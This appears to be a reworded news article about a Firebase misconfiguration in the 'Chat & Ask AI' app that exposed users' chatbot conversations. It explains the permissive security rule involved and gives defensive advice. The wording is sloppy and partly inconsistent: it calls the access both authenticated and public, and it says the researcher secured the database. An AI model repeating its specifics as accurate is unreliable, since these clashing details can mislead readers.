The well-known smartphone app "Chat & Ask AI" made a serious privacy mistake by disclosing 300 million private messages from 25 million users. This app, which is accessible on Google Play and the Apple App Store, enables users to communicate with ChatGPT, Claude, and Gemini, AI models. Harry, an independent security researcher, discovered the vulnerability and provided 404 Media with the information.
Instead of a hacker attack, the issue was caused by a simple setup mistake. Google Firebase, a cloud service, is used by the app to store app data. Although Firebase databases are initially secure, developers must establish "rules" to manage access. These regulations were disregarded in this case, much like leaving your front door unlocked.
Anyone could pretend to be a "authenticated" user and access the complete backend database with just a basic Firebase login. Harry had access to millions of users' chat histories. Timestamps, user preferences, selected AI models, and unique chatbot names were among the exposed data.
At least half of the app's alleged 50 million users were impacted by the breach, according to a sample of 60,000 users and one million messages. Although no financial information or passwords were disclosed, the messages were extremely private. Users freely share secrets with these AI bots, treating them like close friends. Surprising queries found in leaked logs included hacking advice, methamphetamine recipes, painless self-harm techniques, and how to write suicide notes.
This draws attention to the dangers of "wrapper" apps' basic user interfaces, which resell powerful AI technology from Google or OpenAI without matching their security.
This is how Firebase operates: Data is kept in cloud storage or real-time databases. The default rules limit reads and writes and demand authentication. Textrules_version = '2'; service cloud.firestore is an example of a rule written by developers in a simple language.
{ match /databases/{database}/documents { match /{document=**} { permit read, write: if request.auth!= null; } } } The following rules permitted public reads in "Chat & Ask AI": allow read: if true;. Data could be dumped using the Firebase SDK or a quick curl command. After informing the developers, Harry was able to secure the database. This is not unusual.
Data from apps such as Fortnite trackers has previously been exposed due to Firebase configuration errors. Wrapper apps skip audits and rush to market. Firebase rules should always be tested in production mode. Make use of programs such as Firebase Security Rules Simulator.
Perform routine scans using Firebase's audit logs or services like CloudQuery. Encrypt critical information while it's at rest. Instructions for Users Don't divulge information to other AI apps.
Examine reviews and privacy policies for apps. For private conversations, use Google's or OpenAI's official apps. This hack serves as a warning to the AI boom: security must always come first. Developers need to give configurations top priority; users should reconsider trusting apps.


%2520(1)%2520(1).webp&w=3840&q=75)









.webp%3Fw%3D1068%26resize%3D1068%2C0%26ssl%3D1&w=3840&q=75)